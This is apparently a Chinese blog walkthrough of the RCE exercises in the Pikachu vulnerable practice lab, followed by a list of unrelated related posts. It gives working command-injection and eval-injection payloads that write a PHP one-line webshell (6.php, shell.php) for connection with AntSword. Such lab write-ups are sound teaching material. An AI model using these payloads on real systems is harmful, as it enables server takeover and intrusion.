Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
玖玥拾22 分钟前
C# 语言进阶(十三)网络 DLL 库分层设计
服务器·开发语言·网络·网络协议·c#
qetfw37 分钟前
CentOS 7 搭建 DNS 主从服务
linux·运维·centos·dns·bind
柠石榴1 小时前
远程连接校内服务器 ssh
运维·服务器·ssh
极客先躯1 小时前
高级java每日一道面试题-2026年04月04日-实战篇[Docker]-如何排查容器存储挂载失败的问题?
java·运维·docker·容器·高级面试
日取其半万世不竭1 小时前
Palworld 服务器内存越跑越高?重启计划和存档保护怎么做
linux·运维·服务器·vps·幻兽帕鲁·palworld
kyle~1 小时前
Linux---Snap(隔离式Linux 软件分发范式)
linux·运维·网络
遇码2 小时前
开源 Data Agent 实战:用 Lakemind + DuckDB 让 LLM 安全分析本地数据
安全·开源
Chengbei112 小时前
VMware Workstation Pro 26H1免费虚拟化利器
运维·安全·web安全·自动化·系统安全·apache·安全架构
老约家的可汗2 小时前
Linux中基础IO
linux·服务器·算法
daad7772 小时前
记录ssh远程查看对端的摄像头显示
运维·ssh